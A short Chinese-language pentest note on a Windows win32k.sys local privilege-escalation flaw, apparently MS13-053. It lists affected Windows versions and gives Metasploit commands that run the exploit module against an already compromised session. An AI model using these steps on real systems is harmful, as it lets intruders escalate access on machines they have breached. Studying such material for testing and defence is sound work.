内核模式驱动程序中的win32k.sys不会 正确处理内存中的对象,这允许本地用户通过精心设计的应用程序获得特权。
| Product | CPU Architecture | Version | Update | Tested |
|---|---|---|---|---|
| Windows 7 | SP1 | ✔ | ||
| Windows 8 | ||||
| Windows Rt | ||||
| Windows Server 2003 | SP2 | |||
| Windows Server 2008 | SP2 | ✔ | ||
| Windows Server 2008 | R2 | SP1 | ✔ | |
| Windows Server 2012 | ||||
| Windows Vista | SP2 | |||
| Windows Xp | SP2 | |||
| Windows Xp | SP3 |
X86利用
测试系统Windows 7 SP1 x86 ,直接使用msf即可,我们当机器已经上线了
use exploit/windows/local/ms13_053_schlamperei
set SESSION 2 #你上线机器的session
run
Windows Sever 2003 SP2 x86 和Windows Sever 2003 R2 SP2 x86都测试成功,但是利用文件没有源码只有exe可执行文件
Windows Sever 2003 SP2 x86 动图如下
Windows Sever 2003 R2 SP2 x86 动图如下
